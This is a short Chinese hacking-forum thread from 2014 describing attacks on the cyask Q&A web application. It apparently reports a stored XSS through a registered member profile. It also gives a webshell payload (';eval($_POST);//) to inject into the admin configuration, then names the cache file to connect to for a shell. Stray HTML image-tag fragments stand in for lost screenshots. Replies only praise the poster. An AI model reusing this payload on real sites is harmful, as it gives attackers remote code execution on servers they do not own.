Diana 发表于 2014-2-28 04:47:19

cyask 前台xss与后台Getshell

首先是注册一枚

xss" width="614" height="390" style="border: 0px;" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>
然后查看会员资料,发现xss已经成功的触发了

xss2" width="984" height="241" style="border: 0px;" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>

关于后台拿shell,在配置文件出插入
?
1
';eval($_POST);//
经过检查,只能插入四处

插入后连接
askdata\cache\cache_variable.php

Benq 发表于 2014-2-28 11:25:51

厉害阿!!!!!!!!!!!!!!顶一个

夜尽天明 发表于 2014-3-1 11:19:42

楼主专注东东30年
页: [1]
查看完整版本: cyask 前台xss与后台Getshell